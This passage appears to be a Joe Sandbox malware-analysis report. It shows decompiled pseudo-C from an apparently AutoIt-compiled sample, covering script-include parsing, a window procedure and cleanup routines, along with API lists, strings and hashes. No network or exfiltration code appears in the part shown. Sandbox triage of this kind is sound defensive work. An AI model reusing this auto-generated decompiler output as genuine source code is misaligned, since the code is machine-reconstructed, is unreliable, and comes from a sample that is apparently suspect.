					__eflags = E013B2BE0( &_v92,  *_a4, 2);
					if(__eflags != 0) {
						L67:
						E0141A072(_v220, _t449, __eflags, _t489, _a12, _a20, L"Error opening the file", _a16);
						L20:
						E013B774C( &_v68);
						_t229 = E013B774C( &_v52);
						goto L21;
					}
					_t293 = E0142358A( &_v92,  &_v68, __eflags,  &_v92,  &_v224,  &_v208);
					E013B2C4E( &_v104);
					__eflags = _t293;
					if(__eflags != 0) {
						goto L67;
					}
					_t464 = 4;
					_push(0x10);
					_t296 =  *_v224;
					_v172 = _t296;
					_v196 = _t296 | 0xffffffff;
					_v184 = _t364;
					_v180 = _t364;
					_v176 = _t364;
					_t298 = E013D01FB(_t464, __eflags);
					_t456 = _t298;
					_v160 = _t456;
					 *_t456 = 0x144dc04;
					 *((intOrPtr*)(_t456 + 4)) = _t364;
					 *((intOrPtr*)(_t456 + 8)) = _t364;
					 *((intOrPtr*)(_t456 + 0xc)) = _t364;
					_v208 = _t456;
					_v194 = _t298 | 0xffffffff;
					E013B8D73( &_v204, _t489, 5);
					_v208 = _v176;
					E013B8C8D(_t456,  &_v208);
					_t457 = _v228;
					_v172 = _t364;
					_v176 = 1;
					__eflags = _v180 - 1;
					if(_v180 < 1) {
						L64:
						E013B8D73( &_v204, _t489, 5);
						_v208 = _v168;
						E01421328( *((intOrPtr*)( *((intOrPtr*)(_v164 + 4)))),  &_v208);
						E01414991(_t457 + 0x50, _t457,  &_v216);
						L013D4D9E(_v236);
						_t364 = 1;
						L65:
						_v188 = 0x144dc04;
						E013BBFB0( &_v188);
						E013D0234(_v184);
						E01421310( &_v204, __eflags);
						goto L20;
					} else {
						goto L41;
					}
					do {
						do {
							while(1) {
								L41:
								_t318 = _v224 + _t464;
								_t464 = _t464 + 1;
								_v220 = _t464;
								_v156 =  *_t318 & 0x000000ff;
								E013B8D73( &_v204, _t489,  *_t318 & 0x000000ff);
								__eflags = _v200 - 0xf;
								if(_v200 <= 0xf) {
									break;
								}
								_t321 = E0142142E( &_v204);
								__eflags = _t321;
								if(_t321 == 0) {
									_t322 = E0142141A( &_v204);
									__eflags = _t322;
									if(_t322 == 0) {
										__eflags = E013B7962( &_v204);
										if(__eflags == 0) {
											goto L58;
										}
										_t465 = E01419E55(__eflags, _v224,  &_v220);
										_t337 = _v164;
										_v220 = _t465;
										_push(_t465);
										__eflags = _t337 - 0x31;
										if(__eflags != 0) {
											__eflags = _t337 - 0x30;
											if(__eflags != 0) {
												__eflags = _t337 - 0x37;
												if(__eflags != 0) {
													E014213B6( &_v204, __eflags);
													L57:
													E013D0234(_t465);
													_t464 = _v220;
													goto L58;
												}
												__eflags = E01419D84(_t364, _t457);
												if(__eflags == 0) {
													E0141A072(_t457, _t449, __eflags, _t489, _a4, _v168, L"Bad directive syntax error", 0x144dbf4);
													E013D0234(_t465);
													L013D4D9E(_v240);
													goto L65;
												}
												E013D0234(_t465);
												_t464 = _v220;
												continue;
											}
											E013BC110( &_v20, __eflags);
											_t466 = E013BBCCB( &_v24);
											E013B774C( &_v24);
											_push(_t364);
											L52:
											E013B8D73( &_v204, _t489);
											_v208 = _t466;
											_t465 = _v216;
											goto L57;
										}
										E013BC110( &_v36, __eflags);
										_t449 =  *( *(_t457 + 4));
										_t466 =  *((intOrPtr*)( *( *(_t457 + 4)) + 4))(_v40);
										E013B774C( &_v44);
										_push(1);
										goto L52;
									}
									_t354 = _v224 + _t464;
									_t464 = _t464 + 8;
									_t489 =  *_t354;
									_v204 =  *_t354;
									goto L58;
								}
								_t446 = _v224 + _t464;
								_t464 = _t464 + 8;
								_v204 =  *_t446;
								_v200 =  *((intOrPtr*)(_t446 + 4));
								goto L58;
							}
							_t358 = _v224 + _t464;
							_t464 = _t464 + 4;
							_v204 =  *_t358;
							L58:
							E013B8C8D(_v160,  &_v204);
							__eflags = _v160 - 0x7f;
						} while (_v160 != 0x7f);
						_t430 = _v160;
						_t449 =  *(_t430 + 8);
						__eflags = _t449 - 2;
						if(_t449 <= 2) {
							L62:
							E0141A3CE(_t430);
							goto L63;
						}
						_t330 =  *((intOrPtr*)( *((intOrPtr*)(_t430 + 4)) + _t449 * 4 - 8));
						_t449 = 0x7f;
						__eflags =  *((intOrPtr*)(_t330 + 8)) - _t449;
						if( *((intOrPtr*)(_t330 + 8)) == _t449) {
							goto L62;
						}
						_v164 = _v164 + 1;
						_t331 = 0x3b;
						_v212 = _t331;
						E013B7998(_t457,  *((intOrPtr*)(_t457 + 0x10)),  &_v212, _t331 | 0xffffffff);
						L63:
						_t328 = _v168 + 1;
						_v168 = _t328;
						__eflags = _t328 - _v172;
					} while (_t328 <= _v172);
					goto L64;
				}
				L4:
				E013B9091( &_v188, _t475);
				E013B9091( &_v204, _t475);
				_t450 =  &_v188;
				E013B6052( &_v68,  &_v188, _t475, _t489,  &_v204, _t364, _t364);
				E013B4D30( &_v188, _t489,  &_v204);
				SetCurrentDirectoryW(_v192); // executed
				E013B774C( &_v208);
				E013B774C( &_v192);
				_push(0x2000); // executed
				_t254 = E013D022B( &_v192, _t461, _t475); // executed
				_t394 =  &_v160;
				_t255 = E013B3172(_t394, _t254);
				_t462 = _v164;
				_t455 = _v228;
				while(1) {
					_t476 = _v214 - 1;
					if(_v214 != 1) {
						break;
					}
					_push(_t394);
					_t255 = E013B81E9(_t450, _t476, _t489, _t462); // executed
					if(_t255 == 0) {
						break;
					}
					_t263 = _v228 + 1;
					_v228 = _t263;
					_v224 = _t263;
					E013B7BB5(_t462);
					_t265 = E013B7C02(_t462);
					_push(_t462);
					_t478 = _t265;
					if(_t265 == 0) {
						_push(L"Unterminated string");
						_push(_v228);
						_push(_a12);
						_t255 = E0141A072(_t455, _t450, __eflags, _t489);
						_v245 = _t364;
						break;
					}
					E013B7CA2(_t478);
					_v221 = _t364;
					_t268 = E013D4D83();
					_v216 = _t268;
					if(_t268 > 2) {
						_t406 = 0x7f;
						if(E013D67E5(_t406,  *(_t462 + _t268 * 2 - 4) & _t406 & 0x0000ffff) != 0) {
							_t286 = _v212;
							__eflags =  *((short*)(_t462 + _t286 * 2 - 2)) - 0x5f;
							if(__eflags == 0) {
								_v217 = 1;
								 *((short*)(_t462 + _t286 * 2 - 2)) = 0;
							}
						}
					}
					_t481 = _v216 - 1;
					if(_v216 == 1) {
						_t394 = _t455;
						E01419D1D(_t394, _t462);
						L17:
						_t255 = _v217;
						_v216 = _v217;
						if(_v229 == 1) {
							continue;
						}
						break;
					}
					E013BC110( &_v192, _t481, _v72); // executed
					_t274 = E013B7CDD(_t455, _t450, _t481, _t489, _t462,  &_v196,  &_v228,  &_v156); // executed
					_t394 = _t274;
					_v232 = _t394;
					 *_v200 =  *_v200 - 1;
					if( *_v200 == _t364) {
						E013D0234(_v192);
						_push(4);
						E013D01ED(_v180);
						_t394 = _v212;
					}
					if(_t394 == 0) {
						_v229 = _t364;
						L26:
						_v228 = _v224;
						goto L17;
					}
					if(_t394 <= 1) {
						goto L26;
					}
					if(_t394 > 3) {
						__eflags = _t394 - 4;
						if(__eflags == 0) {
							_v218 = _t364;
						}
						goto L26;
					}
					_t394 = _t455;
					_v228 = _v224;
					E013B7998(_t394, _v224, _t462, _a8); // executed
					goto L17;
				}
				E013B62AD(_t255,  &_v148);
				SetCurrentDirectoryW(_v52);
				_t258 = _v152;
				_t364 = _v225;
				 *_t258 =  *_t258 - 1;
				if( *_t258 == 0) {
					_push(4);
					E013D01ED(_t258);
					E013D0234(_t462);
				}
				goto L20;
			}

0x013b7e80
0x013b7e80
0x013b7e8c
0x013b7e93
0x013b7e96
0x013b7e9a
0x013b7ea0
0x013b7ea3
0x013f60d6
0x013f60db
0x013b81b2
0x013b81b2
0x013b81c0
0x013b81c0
0x013b7ea9
0x013b7eab
0x013b7eb2
0x013b7eb7
0x013b7ebc
0x013b7ec0
0x013b7ec4
0x013b7ed2
0x013b7ed6
0x013b7ef1
0x013b7ef6
0x013b7f04
0x013b7f0b
0x013b7f12
0x013f650a
0x013b818d
0x013b8191
0x013b81a3
0x013b81ac
0x00000000
0x013b81b1
0x013b7f25
0x013b7f2e
0x013b7f33
0x013b7f3b
0x013f60e2
0x013f60ea
0x013f60fa
0x013f60fa
0x013f6102
0x013f610d
0x013f6115
0x013f6120
0x013f6128
0x00000000
0x00000000
0x013f612e
0x013f6130
0x013f6135
0x013f6139
0x00000000
0x013f6139
0x013f6117
0x013f6119
0x00000000
0x013f6119
0x013f6104
0x013f6106
0x00000000
0x013f6106
0x013f60f0
0x013f60f4
0x00000000
0x00000000
0x00000000
0x013f60f4
0x013b7f41
0x013b7f48
0x013b7f54
0x013b7f60
0x013b7f65
0x013b7f6e
0x013b7f7b
0x013b7f8b
0x013b7f94
0x013b7fa0
0x013b7fa5
0x013b7fb0
0x013f6143
0x013f614e
0x00000000
0x00000000
0x013f6158
0x013f6169
0x013f6170
0x013f6179
0x013f6185
0x013f6187
0x013f6491
0x013f64a3
0x013b8175
0x013b817c
0x013b8188
0x00000000
0x013b8188
0x013f619f
0x013f61ad
0x013f61b2
0x013f61b4
0x00000000
0x00000000
0x013f61c0
0x013f61c1
0x013f61c3
0x013f61c5
0x013f61cc
0x013f61d1
0x013f61d5
0x013f61d9
0x013f61dd
0x013f61e2
0x013f61ee
0x013f61f2
0x013f61f8
0x013f61fb
0x013f61fe
0x013f6201
0x013f6205
0x013f620a
0x013f6215
0x013f621e
0x013f6223
0x013f622a
0x013f622e
0x013f6232
0x013f6236
0x013f63fe
0x013f6404
0x013f640d
0x013f641f
0x013f642c
0x013f6435
0x013f643a
0x013f643c
0x013f6441
0x013f6449
0x013f6452
0x013f645c
0x00000000
0x00000000
0x00000000
0x00000000
0x013f623c
0x013f623c
0x013f623c
0x013f623c
0x013f6244
0x013f6246
0x013f6247
0x013f624f
0x013f6253
0x013f6258
0x013f625e
0x00000000
0x00000000
0x013f6278
0x013f627d
0x013f627f
0x013f62a0
0x013f62a5
0x013f62a7
0x013f62c6
0x013f62c8
0x00000000
0x00000000
0x013f62dc
0x013f62de
0x013f62e2
0x013f62e6
0x013f62e7
0x013f62ea
0x013f6319
0x013f631c
0x013f6358
0x013f635b
0x013f6380
0x013f6385
0x013f6386
0x013f638b
0x00000000
0x013f638f
0x013f6364
0x013f6366
0x013f647a
0x013f6480
0x013f648a
0x00000000
0x013f648a
0x013f636d
0x013f6372
0x00000000
0x013f6376
0x013f6325
0x013f633d
0x013f633f
0x013f6344
0x013f6345
0x013f6349
0x013f634e
0x013f6352
0x00000000
0x013f6352
0x013f62f3
0x013f6302
0x013f630e
0x013f6310
0x013f6315
0x00000000
0x013f6315
0x013f62ad
0x013f62af
0x013f62b2
0x013f62b4
0x00000000
0x013f62b4
0x013f6285
0x013f6287
0x013f628c
0x013f6293
0x00000000
0x013f6293
0x013f6264
0x013f6266
0x013f626b
0x013f6390
0x013f6399
0x013f639e
0x013f639e
0x013f63a9
0x013f63ad
0x013f63b0
0x013f63b3
0x013f63e6
0x013f63e6
0x00000000
0x013f63e6
0x013f63ba
0x013f63be
0x013f63bf
0x013f63c3
0x00000000
0x00000000
0x013f63c5
0x013f63cd
0x013f63ce
0x013f63df
0x013f63eb
0x013f63ef
0x013f63f0
0x013f63f4
0x013f63f4
0x00000000
0x013f623c
0x013b7fb6
0x013b7fba
0x013b7fc3
0x013b7fcf
0x013b7fda
0x013b7feb
0x013b7ff4
0x013b7ffe
0x013b8007
0x013b800c
0x013b8011
0x013b8018
0x013b801c
0x013b8021
0x013b8025
0x013b8029
0x013b8029
0x013b802e
0x00000000
0x00000000
0x013b8034
0x013b803a
0x013b8041
0x00000000
0x00000000
0x013b804b
0x013b804d
0x013b8051
0x013b8055
0x013b805b
0x013b8060
0x013b8061
0x013b8063
0x013f64e3
0x013f64e8
0x013f64e9
0x013f64ec
0x013f64f1
0x00000000
0x013f64f1
0x013b8069
0x013b806f
0x013b8073
0x013b8078
0x013b8080
0x013b8089
0x013b8099
0x013b81c3
0x013b81c7
0x013b81cd
0x013f64af
0x013f64b4
0x013f64b4
0x013b81cd
0x013b8099
0x013b809f
0x013b80a4
0x013f64bf
0x013f64c1
0x013b812e
0x013b8133
0x013b8137
0x013b813b
0x00000000
0x00000000
0x00000000
0x013b813b
0x013b80b5
0x013b80cc
0x013b80d1
0x013b80d7
0x013b80db
0x013b80e3
0x013b80e9
0x013b80ef
0x013b80f5
0x013b80fc
0x013b80fc
0x013b8102
0x013b81d8
0x013b81dc
0x013b81e0
0x00000000
0x013b81e0
0x013b810b
0x00000000
0x00000000
0x013b8114
0x013f64cb
0x013f64ce
0x013f64d4
0x013f64d4
0x00000000
0x013f64ce
0x013b8121
0x013b8125
0x013b8129
0x00000000
0x013b8129
0x013b8145
0x013b8151
0x013b8157
0x013b815b
0x013b815f
0x013b8162
0x013b8164
0x013b8167
0x013b816d
0x013b8172
0x00000000

APIs

Part of subcall function 013B62AD: FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,013B111D,0144DBF4), ref: 013B62CD

Part of subcall function 013B3195: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,013B1153,?,00008000,0144DBF4), ref: 013B31C3

SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 013B7FF4
_wcslen.LIBCMT ref: 013B8073
SetCurrentDirectoryW.KERNEL32(?), ref: 013B8151

Strings

Unterminated string, xrefs: 013F64E3
AU3!, xrefs: 013B7FA5
EA06, xrefs: 013F6143
Bad directive syntax error, xrefs: 013F6471
#include depth exceeded. Make sure there are no recursive includes, xrefs: 013F60CB
Error opening the file, xrefs: 013F6498, 013F64FF

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: CurrentDirectory$ChangeCloseCreateFileFindNotification_wcslen
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2701412040-3738523708
Opcode ID: d43139a20b60d48407007231a0e275991e32bb35559bf6abf09454e24b23e497
Instruction ID: 7bb482c751e59d7a2215dd5367c31cb0c1a727e0db270f441e6858f3b84f6974
Opcode Fuzzy Hash: d43139a20b60d48407007231a0e275991e32bb35559bf6abf09454e24b23e497
Instruction Fuzzy Hash: 841295715083429FC715EF28C881AAFBBE9FFA4318F00091EF685976A1EB70D945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 013B3C00, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E013B3C00(struct HWND__* __ecx, int __edx, void* __fp0, int _a4, unsigned int _a8) {
				char _t10;
				long _t16;
				char _t18;
				int _t20;
				char _t22;
				char _t23;
				char _t29;
				void* _t39;
				void* _t40;
				void* _t41;
				void* _t43;
				void* _t45;
				struct HWND__* _t54;
				int _t67;
				struct HWND__* _t70;
				void* _t81;
				void* _t82;

				_t82 = __fp0;
				_t54 = __ecx;
				_push(__ecx);
				_t10 =  *0x148237c; // 0x11005c
				_t70 = __ecx;
				_t67 = __edx;
				if(__ecx != _t10) {
					__eflags = _t10;
					if(__eflags == 0) {
						goto L1;
					} else {
						L8:
						_t16 = DefWindowProcW(_t70, _t67, _a4, _a8); // executed
						L9:
						return _t16;
					}
				}
				L1:
				if(_t67 <= 0x11) {
					if(__eflags == 0) {
						 *0x1482352 = 0;
						 *0x1482340 = (_a8 >> 0x1f) + 4;
						E013CF18D(0x1482420);
						E013CF060(0x1482420, __eflags, _t82);
						goto L8;
					}
					_t18 = _t67 - 1;
					__eflags = _t18;
					if(_t18 == 0) {
						SetTimer(_t70, 1, 0x2ee, 0); // executed
						_t20 = RegisterWindowMessageW(L"TaskbarCreated");
						__eflags =  *0x14829b0;
						 *0x1483548 = _t20;
						if( *0x14829b0 == 0) {
							 *0x14829b0 = CreatePopupMenu();
						}
						L16:
						_t16 = 0;
						goto L9;
					}
					_t22 = _t18 - 1;
					__eflags = _t22;
					if(_t22 != 0) {
						_t23 = _t22 - 3;
						__eflags = _t23;
						if(_t23 == 0) {
							MoveWindow( *0x1482378, 0, 0, _a8 & 0x0000ffff, _a8 >> 0x10, 1);
							goto L16;
						}
						_t29 = _t23;
						__eflags = _t29;
						if(_t29 == 0) {
							SetFocus( *0x1482378);
							goto L16;
						}
						__eflags = _t29 != 9;
						if(_t29 != 9) {
							L7:
							_t81 = _t67 -  *0x1483548; // 0xc075
							if(_t81 == 0) {
								__eflags =  *0x1482358 - 1;
								if( *0x1482358 == 1) {
									E013B3B82(0x14829b0);
									E013B3DF8(0x14829b0, _t82);
								}
							}
							goto L8;
						}
						 *0x1482352 = 1;
						E013CF18D(0x1482420);
					} else {
						KillTimer(_t70, 1);
						E013B3B82(0x14829b0);
						E013B53CE();
					}
					goto L16;
				}
				_t39 = _t67 - 0x82;
				if(_t39 == 0) {
					PostQuitMessage(0);
					goto L16;
				}
				_t40 = _t39 - 0x8f;
				if(_t40 == 0) {
					_t41 = E0141C7A2(0x14829b0, __eflags, _t82, _t54, _t54, _a4, _a8);
					__eflags = _t41 - 1;
					if(_t41 == 1) {
						goto L16;
					}
					goto L8;
				}
				_t43 = _t40;
				if(_t43 == 0) {
					_push(_t54);
					E013CFD8B(0x14829b0, _t82, _t70, _a4); // executed
					goto L16;
				}
				_t45 = _t43 - 0x1ff;
				if(_t45 == 0) {
					__eflags =  *0x1482357;
					if(__eflags == 0) {
						E01411351(__eflags,  &_a4);
					}
					goto L8;
				}
				if(_t45 == 0xef) {
					E013B3D10(0x14829b0, _t82, _t70, _t54, _t54, _a8);
					goto L16;
				}
				goto L7;
			}

0x013b3c00
0x013b3c00
0x013b3c06
0x013b3c07
0x013b3c0e
0x013b3c11
0x013b3c15
0x013b3c75
0x013b3c77
0x00000000
0x013b3c79
0x013b3c60
0x013b3c68
0x013b3c6e
0x013b3c74
0x013b3c74
0x013b3c77
0x013b3c17
0x013b3c1a
0x013b3c7b
0x013f3fbe
0x013f3fc5
0x013f3fca
0x013f3fd1
0x00000000
0x013f3fd1
0x013b3c83
0x013b3c83
0x013b3c86
0x013b3cb7
0x013b3cc2
0x013b3cc8
0x013b3ccf
0x013b3cd4
0x013b3cdc
0x013b3cdc
0x013b3ca9
0x013b3ca9
0x00000000
0x013b3ca9
0x013b3c88
0x013b3c88
0x013b3c8b
0x013f3f4f
0x013f3f4f
0x013f3f52
0x013f3fa3
0x00000000
0x013f3fa3
0x013f3f55
0x013f3f55
0x013f3f58
0x013f3f7f
0x00000000
0x013f3f7f
0x013f3f5a
0x013f3f5d
0x013b3c54
0x013b3c54
0x013b3c5a
0x013f3fdb
0x013f3fe2
0x013f3fef
0x013f3ff6
0x013f3ff6
0x013f3fe2
0x00000000
0x013b3c5a
0x013f3f68
0x013f3f6f
0x013b3c91
0x013b3c94
0x013b3c9f
0x013b3ca4
0x013b3ca4
0x00000000
0x013b3c8b
0x013b3c1e
0x013b3c23
0x013b3cf7
0x00000000
0x013b3cf7
0x013b3c29
0x013b3c2e
0x013f4028
0x013f402d
0x013f402f
0x00000000
0x00000000
0x00000000
0x013f4035
0x013b3c35
0x013b3c38
0x013b3cff
0x013b3d09
0x00000000
0x013b3d09
0x013b3c3e
0x013b3c43
0x013f4000
0x013f4007
0x013f4011
0x013f4011
0x00000000
0x013f4007
0x013b3c4e
0x013b3cee
0x00000000
0x013b3cee
0x00000000

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,013B3BFA,?,?), ref: 013B3C68
KillTimer.USER32(?,00000001,?,?,?,?,?,013B3BFA,?,?), ref: 013B3C94
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 013B3CB7
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,013B3BFA,?,?), ref: 013B3CC2
CreatePopupMenu.USER32(?,?,?,?,?,013B3BFA,?,?), ref: 013B3CD6
PostQuitMessage.USER32(00000000), ref: 013B3CF7

Strings

TaskbarCreated, xrefs: 013B3CBD

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 09e4e566d9015e5efd4eab10bb98ae4341e8a4d8b52694d31edb55e879e10510
Instruction ID: 6ccf1ffc266243959027b873a8f3a7ba401b17a8b1d7e78213f546f86cd6ccc2
Opcode Fuzzy Hash: 09e4e566d9015e5efd4eab10bb98ae4341e8a4d8b52694d31edb55e879e10510
Instruction Fuzzy Hash: 0F412835244279ABEF255BFED9C9FFD3A59F714608F04011EF70296AA8E7B19800C361

Uniqueness

Uniqueness Score: -1.00%

Function 013B63CE, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E013B63CE(void* __ecx) {
				char _v8;
				void* __edi;
				void* __ebp;
				struct HWND__* _t128;
				int* _t133;
				struct HINSTANCE__* _t136;
				struct HINSTANCE__** _t139;
				struct HINSTANCE__* _t142;
				void* _t150;
				void* _t155;
				void* _t169;
				intOrPtr* _t205;
				struct HINSTANCE__* _t209;
				struct HINSTANCE__* _t211;
				void* _t213;
				intOrPtr* _t214;
				struct HINSTANCE__* _t215;
				struct HINSTANCE__* _t216;
				struct HINSTANCE__* _t235;
				struct HINSTANCE__* _t238;
				struct HINSTANCE__* _t239;
				struct HINSTANCE__* _t242;
				struct HINSTANCE__* _t243;
				struct HINSTANCE__* _t252;
				void* _t255;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				intOrPtr* _t262;
				struct HINSTANCE__* _t263;
				struct HINSTANCE__* _t264;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				struct HINSTANCE__* _t270;
				struct HINSTANCE__* _t272;
				struct HINSTANCE__* _t273;
				struct HINSTANCE__* _t274;
				struct HINSTANCE__* _t275;

				_push(__ecx);
				_t255 = __ecx;
				_t205 = __ecx - 0x494;
				 *((intOrPtr*)( *((intOrPtr*)( *_t205 + 4)) + __ecx - 0x494)) = 0x144db20;
				 *((intOrPtr*)( *((intOrPtr*)( *_t205 + 4)) + __ecx - 0x498)) =  *((intOrPtr*)( *_t205 + 4)) - 0x494;
				_t128 =  *(__ecx - 0x3ac);
				if(_t128 != 0) {
					DestroyWindow(_t128);
				}
				_t258 = 0;
				mciSendStringW(L"close all", 0, 0, 0);
				if( *((intOrPtr*)(_t255 - 0x2c8)) > 0) {
					do {
						_t133 =  *( *( *((intOrPtr*)(_t255 - 0x2cc)) + _t258 * 4));
						__eflags = _t133;
						if(_t133 != 0) {
							UnregisterHotKey( *0x148237c,  *_t133);
							_t252 =  *( *( *((intOrPtr*)(_t255 - 0x2cc)) + _t258 * 4));
							__eflags = _t252;
							if(_t252 != 0) {
								E013CFF16(_t252, _t252);
							}
						}
						_t258 = _t258 + 1;
						__eflags = _t258 -  *((intOrPtr*)(_t255 - 0x2c8));
					} while (_t258 <  *((intOrPtr*)(_t255 - 0x2c8)));
					goto L2;
				} else {
					L2:
					_t259 = 0;
					if( *((intOrPtr*)(_t255 - 0x2f8)) > 0) {
						do {
							_t136 =  *( *( *((intOrPtr*)(_t255 - 0x2fc)) + _t259 * 4));
							__eflags = _t136;
							if(_t136 != 0) {
								__eflags = _t136->i;
								if(_t136->i != 0) {
									FindClose( *(_t136 + 8));
								} else {
									E013B62AD(_t136,  *((intOrPtr*)(_t136 + 4)));
								}
								_t209 =  *( *( *((intOrPtr*)(_t255 - 0x2fc)) + _t259 * 4));
								__eflags = _t209;
								if(_t209 != 0) {
									E01423BC8(_t209, _t209);
								}
							}
							_t259 = _t259 + 1;
							__eflags = _t259 -  *((intOrPtr*)(_t255 - 0x2f8));
						} while (_t259 <  *((intOrPtr*)(_t255 - 0x2f8)));
					}
					E013B51E0(_t205);
					_t260 = 0;
					if( *((intOrPtr*)(_t255 - 0x2e8)) > 0) {
						do {
							_t139 =  *( *((intOrPtr*)(_t255 - 0x2ec)) + _t260 * 4);
							__eflags =  *_t139;
							if( *_t139 != 0) {
								FreeLibrary( *_t139);
							}
							_t260 = _t260 + 1;
							__eflags = _t260 -  *((intOrPtr*)(_t255 - 0x2e8));
						} while (_t260 <  *((intOrPtr*)(_t255 - 0x2e8)));
					}
					_t261 = 0;
					if( *((intOrPtr*)(_t255 - 0x2d8)) > 0) {
						do {
							_t142 =  *( *( *((intOrPtr*)(_t255 - 0x2dc)) + _t261 * 4));
							__eflags = _t142;
							if(_t142 != 0) {
								VirtualFree( *(_t142 + 0x10), 0, 0x8000);
								_t211 =  *( *( *((intOrPtr*)(_t255 - 0x2dc)) + _t261 * 4));
								__eflags = _t211;
								if(_t211 != 0) {
									E01423C2E(_t211, _t211);
								}
							}
							_t261 = _t261 + 1;
							__eflags = _t261 -  *((intOrPtr*)(_t255 - 0x2d8));
						} while (_t261 <  *((intOrPtr*)(_t255 - 0x2d8)));
					}
					_t262 = _t255 - 0x2bc;
					E013BD720(_t262);
					_t213 = 0;
					 *((intOrPtr*)(_t262 + 0xc)) = 1;
					 *_t262 = 0;
					_t146 =  *((intOrPtr*)( *_t205 + 4)) + _t255;
					if( *((intOrPtr*)( *((intOrPtr*)( *_t205 + 4)) + _t255 - 0x490)) == 0) {
						L8:
						__imp__OleUninitialize(); // executed
						_t214 =  *((intOrPtr*)(_t255 - 0x24));
						if(_t214 != 0) {
							_t95 = _t214 + 4;
							 *_t95 =  *(_t214 + 4) - 1;
							__eflags =  *_t95;
							if( *_t95 == 0) {
								 *((intOrPtr*)( *_t214))(1);
							}
						}
						_t215 =  *(_t255 - 0x30);
						if(_t215 != 0) {
							do {
								_t263 =  *(_t215 + 4);
								E01423C02(_t215, _t215);
								_t215 = _t263;
								__eflags = _t263;
							} while (_t263 != 0);
							goto L10;
						} else {
							L10:
							 *((intOrPtr*)(_t255 - 0x28)) = 0;
							_t216 =  *(_t255 - 0x40);
							if(_t216 != 0) {
								while(1) {
									_t264 =  *(_t216 + 4);
									E013CFB08(_t216, _t216);
									_t216 = _t264;
									__eflags = _t264;
									if(_t264 == 0) {
										goto L11;
									}
								}
							}
							L11:
							 *((intOrPtr*)(_t255 - 0x38)) = 0;
							E013B774C(_t255 - 0x60);
							_t150 = E013B61BA(_t255 - 0x190);
							 *((intOrPtr*)(_t255 - 0x1ac)) = 0x144db48;
							E013B5228(_t150, _t255 - 0x1ac);
							E013D0234( *((intOrPtr*)(_t255 - 0x1ac + 4)));
							E013B6214(_t255 - 0x29c, _t255);
							E013B774C(_t255 - 0x2ac);
							_t155 = E013BD720(_t255 - 0x2bc);
							 *((intOrPtr*)(_t255 - 0x2d0)) = 0x144db40;
							E013B523E(_t155, _t255 - 0x2d0);
							E013D0234( *((intOrPtr*)(_t255 - 0x2d0 + 4)));
							_t267 = 0;
							 *((intOrPtr*)(_t255 - 0x2e0)) = 0x144db44;
							if( *((intOrPtr*)(_t255 - 0x2d8)) > 0) {
								do {
									_push(4);
									E013D01ED( *((intOrPtr*)( *((intOrPtr*)(_t255 - 0x2dc)) + _t267 * 4)));
									 *((intOrPtr*)( *((intOrPtr*)(_t255 - 0x2dc)) + _t267 * 4)) = 0;
									_t267 = _t267 + 1;
									__eflags = _t267 -  *((intOrPtr*)(_t255 - 0x2d8));
								} while (_t267 <  *((intOrPtr*)(_t255 - 0x2d8)));
							}
							 *((intOrPtr*)(_t255 - 0x2d8)) = 0;
							E013D0234( *((intOrPtr*)(_t255 - 0x2dc)));
							_t268 = 0;
							 *((intOrPtr*)(_t255 - 0x2f0)) = 0x144db44;
							if( *((intOrPtr*)(_t255 - 0x2e8)) > 0) {
								do {
									_push(4);
									E013D01ED( *((intOrPtr*)( *((intOrPtr*)(_t255 - 0x2ec)) + _t268 * 4)));
									 *((intOrPtr*)( *((intOrPtr*)(_t255 - 0x2ec)) + _t268 * 4)) = 0;
									_t268 = _t268 + 1;
									__eflags = _t268 -  *((intOrPtr*)(_t255 - 0x2e8));
								} while (_t268 <  *((intOrPtr*)(_t255 - 0x2e8)));
							}
							 *((intOrPtr*)(_t255 - 0x2e8)) = 0;
							E013D0234( *((intOrPtr*)(_t255 - 0x2ec)));
							_t269 = 0;
							 *((intOrPtr*)(_t255 - 0x300)) = 0x144db44;
							if( *((intOrPtr*)(_t255 - 0x2f8)) > 0) {
								do {
									_push(4);
									E013D01ED( *((intOrPtr*)( *((intOrPtr*)(_t255 - 0x2fc)) + _t269 * 4)));
									 *((intOrPtr*)( *((intOrPtr*)(_t255 - 0x2fc)) + _t269 * 4)) = 0;
									_t269 = _t269 + 1;
